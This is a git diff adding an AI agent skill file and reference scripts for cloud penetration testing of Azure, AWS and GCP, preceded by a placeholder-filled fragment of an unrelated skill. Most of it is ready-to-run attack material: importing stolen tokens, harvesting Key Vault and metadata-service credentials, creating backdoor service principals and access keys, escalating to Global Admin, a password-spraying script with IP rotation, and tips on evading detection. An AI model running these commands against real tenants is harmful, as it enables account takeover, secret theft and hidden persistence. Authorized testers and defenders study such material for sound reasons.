- Centralize all auth logic in middleware
|
||||
|
||||
|
||||
### Server Component Authentication
|
||||
|
||||
Access auth state in Server Components using auth() and currentUser().
|
||||
|
||||
Key functions:
|
||||
- auth(): Returns userId, sessionId, orgId, claims
|
||||
- currentUser(): Returns full User object
|
||||
- Both require clerkMiddleware to be configured
|
||||
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
498
skills/cloud-penetration-testing/SKILL.md
Normal file
498
skills/cloud-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,498 @@
|
||||
---
|
||||
name: Cloud Penetration Testing
|
||||
description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
|
||||
---
|
||||
|
||||
# Cloud Penetration Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
```bash
|
||||
# Azure tools
|
||||
Install-Module -Name Az -AllowClobber -Force
|
||||
Install-Module -Name MSOnline -Force
|
||||
Install-Module -Name AzureAD -Force
|
||||
|
||||
# AWS CLI
|
||||
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
|
||||
unzip awscliv2.zip && sudo ./aws/install
|
||||
|
||||
# GCP CLI
|
||||
curl https://sdk.cloud.google.com | bash
|
||||
gcloud init
|
||||
|
||||
# Additional tools
|
||||
pip install scoutsuite pacu
|
||||
```
|
||||
|
||||
### Required Knowledge
|
||||
- Cloud architecture fundamentals
|
||||
- Identity and Access Management (IAM)
|
||||
- API authentication mechanisms
|
||||
- DevOps and automation concepts
|
||||
|
||||
### Required Access
|
||||
- Written authorization for testing
|
||||
- Test credentials or access tokens
|
||||
- Defined scope and rules of engagement
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
|
||||
2. **Resource Inventory** - Enumerated services, storage, and compute instances
|
||||
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
|
||||
4. **Remediation Recommendations** - Hardening guidance per platform
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Reconnaissance
|
||||
|
||||
Gather initial information about target cloud presence:
|
||||
|
||||
```bash
|
||||
# Azure: Get federation info
|
||||
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"
|
||||
|
||||
# Azure: Get Tenant ID
|
||||
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
|
||||
|
||||
# Enumerate cloud resources by company name
|
||||
python3 cloud_enum.py -k targetcompany
|
||||
|
||||
# Check IP against cloud providers
|
||||
cat ips.txt | python3 ip2provider.py
|
||||
```
|
||||
|
||||
### Phase 2: Azure Authentication
|
||||
|
||||
Authenticate to Azure environments:
|
||||
|
||||
```powershell
|
||||
# Az PowerShell Module
|
||||
Import-Module Az
|
||||
Connect-AzAccount
|
||||
|
||||
# With credentials (may bypass MFA)
|
||||
$credential = Get-Credential
|
||||
Connect-AzAccount -Credential $credential
|
||||
|
||||
# Import stolen context
|
||||
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
|
||||
|
||||
# Export context for persistence
|
||||
Save-AzContext -Path C:\Temp\AzureAccessToken.json
|
||||
|
||||
# MSOnline Module
|
||||
Import-Module MSOnline
|
||||
Connect-MsolService
|
||||
```
|
||||
|
||||
### Phase 3: Azure Enumeration
|
||||
|
||||
Discover Azure resources and permissions:
|
||||
|
||||
```powershell
|
||||
# List contexts and subscriptions
|
||||
Get-AzContext -ListAvailable
|
||||
Get-AzSubscription
|
||||
|
||||
# Current user role assignments
|
||||
Get-AzRoleAssignment
|
||||
|
||||
# List resources
|
||||
Get-AzResource
|
||||
Get-AzResourceGroup
|
||||
|
||||
# Storage accounts
|
||||
Get-AzStorageAccount
|
||||
|
||||
# Web applications
|
||||
Get-AzWebApp
|
||||
|
||||
# SQL Servers and databases
|
||||
Get-AzSQLServer
|
||||
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
|
||||
|
||||
# Virtual machines
|
||||
Get-AzVM
|
||||
$vm = Get-AzVM -Name "VMName"
|
||||
$vm.OSProfile
|
||||
|
||||
# List all users
|
||||
Get-MSolUser -All
|
||||
|
||||
# List all groups
|
||||
Get-MSolGroup -All
|
||||
|
||||
# Global Admins
|
||||
Get-MsolRole -RoleName "Company Administrator"
|
||||
Get-MSolGroupMember -GroupObjectId $GUID
|
||||
|
||||
# Service Principals
|
||||
Get-MsolServicePrincipal
|
||||
```
|
||||
|
||||
### Phase 4: Azure Exploitation
|
||||
|
||||
Exploit Azure misconfigurations:
|
||||
|
||||
```powershell
|
||||
# Search user attributes for passwords
|
||||
$users = Get-MsolUser -All
|
||||
foreach($user in $users){
|
||||
$props = @()
|
||||
$user | Get-Member | foreach-object{$props+=$_.Name}
|
||||
foreach($prop in $props){
|
||||
if($user.$prop -like "*password*"){
|
||||
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Execute commands on VMs
|
||||
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
|
||||
|
||||
# Extract VM UserData
|
||||
$vms = Get-AzVM
|
||||
$vms.UserData
|
||||
|
||||
# Dump Key Vault secrets
|
||||
az keyvault list --query '[].name' --output tsv
|
||||
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
|
||||
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
|
||||
az keyvault secret show --id <URI>
|
||||
```
|
||||
|
||||
### Phase 5: Azure Persistence
|
||||
|
||||
Establish persistence in Azure:
|
||||
|
||||
```powershell
|
||||
# Create backdoor service principal
|
||||
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
|
||||
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
|
||||
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
|
||||
|
||||
# Add service principal to Global Admin
|
||||
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
|
||||
$role = Get-MsolRole -RoleName "Company Administrator"
|
||||
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
|
||||
|
||||
# Login as service principal
|
||||
$cred = Get-Credential # AppID as username, secret as password
|
||||
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
|
||||
|
||||
# Create new admin user via CLI
|
||||
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
|
||||
```
|
||||
|
||||
### Phase 6: AWS Authentication
|
||||
|
||||
Authenticate to AWS environments:
|
||||
|
||||
```bash
|
||||
# Configure AWS CLI
|
||||
aws configure
|
||||
# Enter: Access Key ID, Secret Access Key, Region, Output format
|
||||
|
||||
# Use specific profile
|
||||
aws configure --profile target
|
||||
|
||||
# Test credentials
|
||||
aws sts get-caller-identity
|
||||
```
|
||||
|
||||
### Phase 7: AWS Enumeration
|
||||
|
||||
Discover AWS resources:
|
||||
|
||||
```bash
|
||||
# Account information
|
||||
aws sts get-caller-identity
|
||||
aws iam list-users
|
||||
aws iam list-roles
|
||||
|
||||
# S3 Buckets
|
||||
aws s3 ls
|
||||
aws s3 ls s3://bucket-name/
|
||||
aws s3 sync s3://bucket-name ./local-dir
|
||||
|
||||
# EC2 Instances
|
||||
aws ec2 describe-instances
|
||||
|
||||
# RDS Databases
|
||||
aws rds describe-db-instances --region us-east-1
|
||||
|
||||
# Lambda Functions
|
||||
aws lambda list-functions --region us-east-1
|
||||
aws lambda get-function --function-name <name>
|
||||
|
||||
# EKS Clusters
|
||||
aws eks list-clusters --region us-east-1
|
||||
|
||||
# Networking
|
||||
aws ec2 describe-subnets
|
||||
aws ec2 describe-security-groups --group-ids <sg-id>
|
||||
aws directconnect describe-connections
|
||||
```
|
||||
|
||||
### Phase 8: AWS Exploitation
|
||||
|
||||
Exploit AWS misconfigurations:
|
||||
|
||||
```bash
|
||||
# Check for public RDS snapshots
|
||||
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
|
||||
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
|
||||
# AttributeValues = "all" means publicly accessible
|
||||
|
||||
# Extract Lambda environment variables (may contain secrets)
|
||||
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
|
||||
|
||||
# Access metadata service (from compromised EC2)
|
||||
curl http://169.254.169.254/latest/meta-data/
|
||||
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||||
|
||||
# IMDSv2 access
|
||||
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
|
||||
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
|
||||
```
|
||||
|
||||
### Phase 9: AWS Persistence
|
||||
|
||||
Establish persistence in AWS:
|
||||
|
||||
```bash
|
||||
# List existing access keys
|
||||
aws iam list-access-keys --user-name <username>
|
||||
|
||||
# Create backdoor access key
|
||||
aws iam create-access-key --user-name <username>
|
||||
|
||||
# Get all EC2 public IPs
|
||||
for region in $(cat regions.txt); do
|
||||
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
|
||||
done
|
||||
```
|
||||
|
||||
### Phase 10: GCP Enumeration
|
||||
|
||||
Discover GCP resources:
|
||||
|
||||
```bash
|
||||
# Authentication
|
||||
gcloud auth login
|
||||
gcloud auth activate-service-account --key-file creds.json
|
||||
gcloud auth list
|
||||
|
||||
# Account information
|
||||
gcloud config list
|
||||
gcloud organizations list
|
||||
gcloud projects list
|
||||
|
||||
# IAM Policies
|
||||
gcloud organizations get-iam-policy <org-id>
|
||||
gcloud projects get-iam-policy <project-id>
|
||||
|
||||
# Enabled services
|
||||
gcloud services list
|
||||
|
||||
# Source code repos
|
||||
gcloud source repos list
|
||||
gcloud source repos clone <repo>
|
||||
|
||||
# Compute instances
|
||||
gcloud compute instances list
|
||||
gcloud beta compute ssh --zone "region" "instance" --project "project"
|
||||
|
||||
# Storage buckets
|
||||
gsutil ls
|
||||
gsutil ls -r gs://bucket-name
|
||||
gsutil cp gs://bucket/file ./local
|
||||
|
||||
# SQL instances
|
||||
gcloud sql instances list
|
||||
gcloud sql databases list --instance <id>
|
||||
|
||||
# Kubernetes
|
||||
gcloud container clusters list
|
||||
gcloud container clusters get-credentials <cluster> --region <region>
|
||||
kubectl cluster-info
|
||||
```
|
||||
|
||||
### Phase 11: GCP Exploitation
|
||||
|
||||
Exploit GCP misconfigurations:
|
||||
|
||||
```bash
|
||||
# Get metadata service data
|
||||
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
|
||||
|
||||
# Check access scopes
|
||||
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
|
||||
|
||||
# Decrypt data with keyring
|
||||
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global
|
||||
|
||||
# Serverless function analysis
|
||||
gcloud functions list
|
||||
gcloud functions describe <name>
|
||||
gcloud functions logs read <name> --limit 100
|
||||
|
||||
# Find stored credentials
|
||||
sudo find /home -name "credentials.db"
|
||||
sudo cp -r /home/user/.config/gcloud ~/.config
|
||||
gcloud auth list
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Azure Key Commands
|
||||
|
||||
| Action | Command |
|
||||
|--------|---------|
|
||||
| Login | `Connect-AzAccount` |
|
||||
| List subscriptions | `Get-AzSubscription` |
|
||||
| List users | `Get-MsolUser -All` |
|
||||
| List groups | `Get-MsolGroup -All` |
|
||||
| Current roles | `Get-AzRoleAssignment` |
|
||||
| List VMs | `Get-AzVM` |
|
||||
| List storage | `Get-AzStorageAccount` |
|
||||
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |
|
||||
|
||||
### AWS Key Commands
|
||||
|
||||
| Action | Command |
|
||||
|--------|---------|
|
||||
| Configure | `aws configure` |
|
||||
| Caller identity | `aws sts get-caller-identity` |
|
||||
| List users | `aws iam list-users` |
|
||||
| List S3 buckets | `aws s3 ls` |
|
||||
| List EC2 | `aws ec2 describe-instances` |
|
||||
| List Lambda | `aws lambda list-functions` |
|
||||
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |
|
||||
|
||||
### GCP Key Commands
|
||||
|
||||
| Action | Command |
|
||||
|--------|---------|
|
||||
| Login | `gcloud auth login` |
|
||||
| List projects | `gcloud projects list` |
|
||||
| List instances | `gcloud compute instances list` |
|
||||
| List buckets | `gsutil ls` |
|
||||
| List clusters | `gcloud container clusters list` |
|
||||
| IAM policy | `gcloud projects get-iam-policy <project>` |
|
||||
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |
|
||||
|
||||
### Metadata Service URLs
|
||||
|
||||
| Provider | URL |
|
||||
|----------|-----|
|
||||
| AWS | `http://169.254.169.254/latest/meta-data/` |
|
||||
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
|
||||
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
|
||||
|
||||
### Useful Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| ScoutSuite | Multi-cloud security auditing |
|
||||
| Pacu | AWS exploitation framework |
|
||||
| AzureHound | Azure AD attack path mapping |
|
||||
| ROADTools | Azure AD enumeration |
|
||||
| WeirdAAL | AWS service enumeration |
|
||||
| MicroBurst | Azure security assessment |
|
||||
| PowerZure | Azure post-exploitation |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only test with explicit written authorization
|
||||
- Respect scope boundaries between cloud accounts
|
||||
- Do not access production customer data
|
||||
- Document all testing activities
|
||||
|
||||
### Technical Limitations
|
||||
- MFA may prevent credential-based attacks
|
||||
- Conditional Access policies may restrict access
|
||||
- CloudTrail/Activity Logs record all API calls
|
||||
- Some resources require specific regional access
|
||||
|
||||
### Detection Considerations
|
||||
- Cloud providers log all API activity
|
||||
- Unusual access patterns trigger alerts
|
||||
- Use slow, deliberate enumeration
|
||||
- Consider GuardDuty, Security Center, Cloud Armor
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Azure Password Spray
|
||||
|
||||
**Scenario:** Test Azure AD password policy
|
||||
|
||||
```powershell
|
||||
# Using MSOLSpray with FireProx for IP rotation
|
||||
# First create FireProx endpoint
|
||||
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create
|
||||
|
||||
# Spray passwords
|
||||
Import-Module .\MSOLSpray.ps1
|
||||
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
|
||||
```
|
||||
|
||||
### Example 2: AWS S3 Bucket Enumeration
|
||||
|
||||
**Scenario:** Find and access misconfigured S3 buckets
|
||||
|
||||
```bash
|
||||
# List all buckets
|
||||
aws s3 ls | awk '{print $3}' > buckets.txt
|
||||
|
||||
# Check each bucket for contents
|
||||
while read bucket; do
|
||||
echo "Checking: $bucket"
|
||||
aws s3 ls s3://$bucket 2>/dev/null
|
||||
done < buckets.txt
|
||||
|
||||
# Download interesting bucket
|
||||
aws s3 sync s3://misconfigured-bucket ./loot/
|
||||
```
|
||||
|
||||
### Example 3: GCP Service Account Compromise
|
||||
|
||||
**Scenario:** Pivot using compromised service account
|
||||
|
||||
```bash
|
||||
# Authenticate with service account key
|
||||
gcloud auth activate-service-account --key-file compromised-sa.json
|
||||
|
||||
# List accessible projects
|
||||
gcloud projects list
|
||||
|
||||
# Enumerate compute instances
|
||||
gcloud compute instances list --project target-project
|
||||
|
||||
# Check for SSH keys in metadata
|
||||
gcloud compute project-info describe --project target-project | grep ssh
|
||||
|
||||
# SSH to instance
|
||||
gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
|
||||
| Permission denied | List current roles; try different resources; check resource policies; verify region |
|
||||
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
|
||||
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |
|
||||
|
||||
## References
|
||||
|
||||
- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation
|
||||
@@ -0,0 +1,318 @@
|
||||
# Advanced Cloud Pentesting Scripts
|
||||
|
||||
Reference: [Cloud Pentesting Cheatsheet by Beau Bullock](https://github.com/dafthack/CloudPentestCheatsheets)
|
||||
|
||||
## Azure Automation Runbooks
|
||||
|
||||
### Export All Runbooks from All Subscriptions
|
||||
|
||||
```powershell
|
||||
$subs = Get-AzSubscription
|
||||
Foreach($s in $subs){
|
||||
$subscriptionid = $s.SubscriptionId
|
||||
mkdir .\$subscriptionid\
|
||||
Select-AzSubscription -Subscription $subscriptionid
|
||||
$runbooks = @()
|
||||
$autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
|
||||
foreach ($i in $autoaccounts){
|
||||
$runbooks += Get-AzAutomationRunbook -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,Name
|
||||
}
|
||||
foreach($r in $runbooks){
|
||||
Export-AzAutomationRunbook -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -Name $r.Name -OutputFolder .\$subscriptionid\
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Export All Automation Job Outputs
|
||||
|
||||
```powershell
|
||||
$subs = Get-AzSubscription
|
||||
$jobout = @()
|
||||
Foreach($s in $subs){
|
||||
$subscriptionid = $s.SubscriptionId
|
||||
Select-AzSubscription -Subscription $subscriptionid
|
||||
$jobs = @()
|
||||
$autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
|
||||
foreach ($i in $autoaccounts){
|
||||
$jobs += Get-AzAutomationJob $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,JobId
|
||||
}
|
||||
foreach($r in $jobs){
|
||||
$jobout += Get-AzAutomationJobOutput -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -JobId $r.JobId
|
||||
}
|
||||
}
|
||||
$jobout | Out-File -Encoding ascii joboutputs.txt
|
||||
```
|
||||
|
||||
## Azure Function Apps
|
||||
|
||||
### List All Function App Hostnames
|
||||
|
||||
```powershell
|
||||
$functionapps = Get-AzFunctionApp
|
||||
foreach($f in $functionapps){
|
||||
$f.EnabledHostname
|
||||
}
|
||||
```
|
||||
|
||||
### Extract Function App Information
|
||||
|
||||
```powershell
|
||||
$subs = Get-AzSubscription
|
||||
$allfunctioninfo = @()
|
||||
Foreach($s in $subs){
|
||||
$subscriptionid = $s.SubscriptionId
|
||||
Select-AzSubscription -Subscription $subscriptionid
|
||||
$functionapps = Get-AzFunctionApp
|
||||
foreach($f in $functionapps){
|
||||
$allfunctioninfo += $f.config | Select-Object AcrUseManagedIdentityCred,AcrUserManagedIdentityId,AppCommandLine,ConnectionString,CorSupportCredentials,CustomActionParameter
|
||||
$allfunctioninfo += $f.SiteConfig | fl
|
||||
$allfunctioninfo += $f.ApplicationSettings | fl
|
||||
$allfunctioninfo += $f.IdentityUserAssignedIdentity.Keys | fl
|
||||
}
|
||||
}
|
||||
$allfunctioninfo
|
||||
```
|
||||
|
||||
## Azure Device Code Login Flow
|
||||
|
||||
### Initiate Device Code Login
|
||||
|
||||
```powershell
|
||||
$body = @{
|
||||
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
|
||||
"resource" = "https://graph.microsoft.com"
|
||||
}
|
||||
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
|
||||
$Headers = @{}
|
||||
$Headers["User-Agent"] = $UserAgent
|
||||
$authResponse = Invoke-RestMethod `
|
||||
-UseBasicParsing `
|
||||
-Method Post `
|
||||
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
|
||||
-Headers $Headers `
|
||||
-Body $body
|
||||
$authResponse
|
||||
```
|
||||
|
||||
Navigate to https://microsoft.com/devicelogin and enter the code.
|
||||
|
||||
### Retrieve Access Tokens
|
||||
|
||||
```powershell
|
||||
$body = @{
|
||||
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
|
||||
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
|
||||
"code" = $authResponse.device_code
|
||||
}
|
||||
$Tokens = Invoke-RestMethod `
|
||||
-UseBasicParsing `
|
||||
-Method Post `
|
||||
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
|
||||
-Headers $Headers `
|
||||
-Body $body
|
||||
$Tokens
|
||||
```
|
||||
|
||||
## Azure Managed Identity Token Retrieval
|
||||
|
||||
```powershell
|
||||
# From Azure VM
|
||||
Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
|
||||
|
||||
# Full instance metadata
|
||||
$instance = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
|
||||
$instance
|
||||
```
|
||||
|
||||
## AWS Region Iteration Scripts
|
||||
|
||||
Create `regions.txt`:
|
||||
```
|
||||
us-east-1
|
||||
us-east-2
|
||||
us-west-1
|
||||
us-west-2
|
||||
ca-central-1
|
||||
eu-west-1
|
||||
eu-west-2
|
||||
eu-west-3
|
||||
eu-central-1
|
||||
eu-north-1
|
||||
ap-southeast-1
|
||||
ap-southeast-2
|
||||
ap-south-1
|
||||
ap-northeast-1
|
||||
ap-northeast-2
|
||||
ap-northeast-3
|
||||
sa-east-1
|
||||
```
|
||||
|
||||
### List All EC2 Public IPs
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $r | jq -r '.[]' >> ec2-public-ips.txt
|
||||
done < regions.txt
|
||||
sort -u ec2-public-ips.txt -o ec2-public-ips.txt
|
||||
```
|
||||
|
||||
### List All ELB DNS Addresses
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws elbv2 describe-load-balancers --query LoadBalancers[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
|
||||
aws elb describe-load-balancers --query LoadBalancerDescriptions[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
|
||||
done < regions.txt
|
||||
sort -u elb-public-dns.txt -o elb-public-dns.txt
|
||||
```
|
||||
|
||||
### List All RDS DNS Addresses
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws rds describe-db-instances --query=DBInstances[*].Endpoint.Address --region $r | jq -r '.[]' >> rds-public-dns.txt
|
||||
done < regions.txt
|
||||
sort -u rds-public-dns.txt -o rds-public-dns.txt
|
||||
```
|
||||
|
||||
### Get CloudFormation Outputs
|
||||
|
||||
```bash
|
||||
while read r; do
|
||||
aws cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region $r | jq -r '.[]' >> cloudformation-outputs.txt
|
||||
done < regions.txt
|
||||
```
|
||||
|
||||
## ScoutSuite jq Parsing Queries
|
||||
|
||||
### AWS Queries
|
||||
|
||||
```bash
|
||||
# Find All Lambda Environment Variables
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables' >> lambda-all-environment-variables.txt
|
||||
done
|
||||
|
||||
# Find World Listable S3 Buckets
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id, .services.s3.findings."s3-bucket-AuthenticatedUsers-read".items[]' >> s3-buckets-world-listable.txt
|
||||
done
|
||||
|
||||
# Find All EC2 User Data
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data' >> ec2-instance-all-user-data.txt
|
||||
done
|
||||
|
||||
# Find EC2 Security Groups That Whitelist AWS CIDRs
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id' >> ec2-security-group-whitelists-aws-cidrs.txt
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.findings."ec2-security-group-whitelists-aws".items' >> ec2-security-group-whitelists-aws-cidrs.txt
|
||||
done
|
||||
|
||||
# Find All EC2 EBS Volumes Unencrypted
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].volumes[] | select(.Encrypted == false) | .arn' >> ec2-ebs-volume-not-encrypted.txt
|
||||
done
|
||||
|
||||
# Find All EC2 EBS Snapshots Unencrypted
|
||||
for d in */ ; do
|
||||
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].snapshots[] | select(.encrypted == false) | .arn' >> ec2-ebs-snapshot-not-encrypted.txt
|
||||
done
|
||||
```
|
||||
|
||||
### Azure Queries
|
||||
|
||||
```bash
|
||||
# List All Azure App Service Host Names
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.appservice.subscriptions[].web_apps[].host_names[]'
|
||||
|
||||
# List All Azure SQL Servers
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.sqldatabase.subscriptions[].servers[] | .name,".database.windows.net","\n"'
|
||||
|
||||
# List All Azure Virtual Machine Hostnames
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.virtualmachines.subscriptions[].instances[] | .name,".",.location,".cloudapp.windows.net","\n"'
|
||||
|
||||
# List Storage Accounts
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.storageaccounts.subscriptions[].storage_accounts[] | .name'
|
||||
|
||||
# List Disks Encrypted with Platform Managed Keys
|
||||
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq '.services.virtualmachines.subscriptions[].disks[] | select(.encryption_type = "EncryptionAtRestWithPlatformKey") | .name' > disks-with-pmks.txt
|
||||
```
|
||||
|
||||
## Password Spraying with Az PowerShell
|
||||
|
||||
```powershell
|
||||
$userlist = Get-Content userlist.txt
|
||||
$passlist = Get-Content passlist.txt
|
||||
$linenumber = 0
|
||||
$count = $userlist.count
|
||||
foreach($line in $userlist){
|
||||
$user = $line
|
||||
$pass = ConvertTo-SecureString $passlist[$linenumber] -AsPlainText -Force
|
||||
$current = $linenumber + 1
|
||||
Write-Host -NoNewline ("`r[" + $current + "/" + $count + "]" + "Trying: " + $user + " and " + $passlist[$linenumber])
|
||||
$linenumber++
|
||||
$Cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
|
||||
try {
|
||||
Connect-AzAccount -Credential $Cred -ErrorAction Stop -WarningAction SilentlyContinue
|
||||
Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
|
||||
Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
|
||||
}
|
||||
catch {
|
||||
$Failure = $_.Exception
|
||||
if ($Failure -match "ID3242") { continue }
|
||||
else {
|
||||
Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
|
||||
Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
|
||||
Add-Content valid-creds.txt $Failure.Message
|
||||
Write-Host -ForegroundColor red $Failure.Message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Service Principal Attack Path
|
||||
|
||||
```bash
|
||||
# Reset service principal credential
|
||||
az ad sp credential reset --id <app_id>
|
||||
az ad sp credential list --id <app_id>
|
||||
|
||||
# Login as service principal
|
||||
az login --service-principal -u "app id" -p "password" --tenant <tenant ID> --allow-no-subscriptions
|
||||
|
||||
# Create new user in tenant
|
||||
az ad user create --display-name <name> --password <password> --user-principal-name <upn>
|
||||
|
||||
# Add user to Global Admin via MS Graph
|
||||
$Body="{'principalId':'User Object ID', 'roleDefinitionId': '62e90394-69f5-4237-9190-012177145e10', 'directoryScopeId': '/'}"
|
||||
